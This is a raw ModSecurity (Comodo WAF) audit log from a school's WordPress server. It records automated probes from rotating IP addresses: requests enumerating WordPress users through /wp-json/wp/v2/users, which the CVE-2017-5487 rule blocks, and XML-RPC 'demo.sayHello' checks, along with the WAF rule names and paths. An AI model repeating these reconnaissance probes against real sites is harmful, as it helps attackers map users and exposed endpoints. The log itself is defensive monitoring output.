"COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426228858795 2539 (- - -) Stopwatch2: 1747426228858795 2539; combined=1223, p1=425, p2=767, p3=0, p4=0, p5=30, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3463618-Z-- --1e73f378-A-- [17/May/2025:03:10:32 +0700] aCebuMe47ocjCGWTS4Y_OwAAAEw 103.236.140.4 54792 103.236.140.4 8181 --1e73f378-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e73f378-C-- demo.sayHello --1e73f378-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e73f378-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426232452235 4604 (- - -) Stopwatch2: 1747426232452235 4604; combined=3624, p1=414, p2=3016, p3=21, p4=23, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e73f378-Z-- --c47f5554-A-- [17/May/2025:03:10:34 +0700] aCebuse47ocjCGWTS4Y_PAAAAEY 103.236.140.4 54794 103.236.140.4 8181 --c47f5554-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c47f5554-C-- demo.sayHello --c47f5554-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c47f5554-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426234746709 5821 (- - -) Stopwatch2: 1747426234746709 5821; combined=4110, p1=583, p2=3309, p3=30, p4=32, p5=93, sr=82, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c47f5554-Z-- --03f00f4e-A-- [17/May/2025:03:10:36 +0700] aCebvNe6THFz1hsaJaLZTgAAAAA 103.236.140.4 54800 103.236.140.4 8181 --03f00f4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03f00f4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03f00f4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426236279494 2651 (- - -) Stopwatch2: 1747426236279494 2651; combined=1192, p1=412, p2=747, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03f00f4e-Z-- --52d47c08-A-- [17/May/2025:03:10:42 +0700] aCebwse47ocjCGWTS4Y_PgAAAE8 103.236.140.4 54804 103.236.140.4 8181 --52d47c08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --52d47c08-C-- demo.sayHello --52d47c08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --52d47c08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426242835515 4558 (- - -) Stopwatch2: 1747426242835515 4558; combined=3536, p1=454, p2=2884, p3=23, p4=25, p5=89, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52d47c08-Z-- --fc93df7d-A-- [17/May/2025:03:11:53 +0700] aCecCdhEtho3ciA0weheeAAAAIg 103.236.140.4 54814 103.236.140.4 8181 --fc93df7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc93df7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc93df7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426313362571 15293 (- - -) Stopwatch2: 1747426313362571 15293; combined=26388, p1=421, p2=860, p3=0, p4=0, p5=12568, sr=72, sw=0, l=0, gc=12539 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc93df7d-Z-- --77fa3339-A-- [17/May/2025:03:12:00 +0700] aCecENe6THFz1hsaJaLZTwAAABg 103.236.140.4 54822 103.236.140.4 8181 --77fa3339-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77fa3339-C-- demo.sayHello --77fa3339-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77fa3339-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426320734254 4646 (- - -) Stopwatch2: 1747426320734254 4646; combined=3589, p1=436, p2=2954, p3=22, p4=26, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77fa3339-Z-- --6404904c-A-- [17/May/2025:03:13:07 +0700] aCecU9hEtho3ciA0weheewAAAJU 103.236.140.4 54832 103.236.140.4 8181 --6404904c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6404904c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6404904c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426387813365 3246 (- - -) Stopwatch2: 1747426387813365 3246; combined=1364, p1=473, p2=859, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6404904c-Z-- --3f01e539-A-- [17/May/2025:03:13:12 +0700] aCecWMe47ocjCGWTS4Y_QwAAAFc 103.236.140.4 54836 103.236.140.4 8181 --3f01e539-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f01e539-C-- demo.sayHello --3f01e539-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f01e539-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426392343397 4853 (- - -) Stopwatch2: 1747426392343397 4853; combined=3696, p1=452, p2=3043, p3=24, p4=27, p5=89, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f01e539-Z-- --f9d7363e-A-- [17/May/2025:03:13:24 +0700] aCecZMe47ocjCGWTS4Y_RAAAAEA 103.236.140.4 54840 103.236.140.4 8181 --f9d7363e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f9d7363e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9d7363e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426404880024 2952 (- - -) Stopwatch2: 1747426404880024 2952; combined=1377, p1=470, p2=869, p3=0, p4=0, p5=37, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9d7363e-Z-- --4c55177b-A-- [17/May/2025:03:13:29 +0700] aCecaUE0LfP59mkCzg42DQAAANA 103.236.140.4 54844 103.236.140.4 8181 --4c55177b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4c55177b-C-- demo.sayHello --4c55177b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c55177b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426409675526 5330 (- - -) Stopwatch2: 1747426409675526 5330; combined=4029, p1=515, p2=3301, p3=28, p4=32, p5=90, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c55177b-Z-- --2128f139-A-- [17/May/2025:03:13:31 +0700] aCeca8e47ocjCGWTS4Y_RQAAAFg 103.236.140.4 54846 103.236.140.4 8181 --2128f139-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2128f139-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2128f139-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426411844868 3378 (- - -) Stopwatch2: 1747426411844868 3378; combined=1433, p1=495, p2=900, p3=0, p4=0, p5=38, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2128f139-Z-- --d47a2d79-A-- [17/May/2025:03:13:39 +0700] aCecc9hEtho3ciA0wehefQAAAI0 103.236.140.4 54852 103.236.140.4 8181 --d47a2d79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d47a2d79-C-- demo.sayHello --d47a2d79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d47a2d79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426419363621 5113 (- - -) Stopwatch2: 1747426419363621 5113; combined=3843, p1=453, p2=3181, p3=23, p4=26, p5=93, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d47a2d79-Z-- --d7e29433-A-- [17/May/2025:03:14:38 +0700] aCecrthEtho3ciA0wehefwAAAJY 103.236.140.4 54860 103.236.140.4 8181 --d7e29433-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.154.4.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.154.4.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d7e29433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7e29433-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426478965716 3364 (- - -) Stopwatch2: 1747426478965716 3364; combined=1441, p1=484, p2=919, p3=0, p4=0, p5=37, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7e29433-Z-- --bc3fa81c-A-- [17/May/2025:03:16:15 +0700] aCedD0E0LfP59mkCzg42DwAAAM4 103.236.140.4 54872 103.236.140.4 8181 --bc3fa81c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bc3fa81c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc3fa81c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426575075334 3570 (- - -) Stopwatch2: 1747426575075334 3570; combined=1495, p1=485, p2=973, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc3fa81c-Z-- --4302b245-A-- [17/May/2025:03:16:19 +0700] aCedE9hEtho3ciA0weheggAAAIA 103.236.140.4 54876 103.236.140.4 8181 --4302b245-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4302b245-C-- demo.sayHello --4302b245-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4302b245-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426579120908 5450 (- - -) Stopwatch2: 1747426579120908 5450; combined=4056, p1=544, p2=3294, p3=29, p4=33, p5=93, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4302b245-Z-- --6337e421-A-- [17/May/2025:03:18:38 +0700] aCednkE0LfP59mkCzg42FgAAAMQ 103.236.140.4 54898 103.236.140.4 8181 --6337e421-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6337e421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6337e421-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426718888374 2762 (- - -) Stopwatch2: 1747426718888374 2762; combined=1262, p1=424, p2=810, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
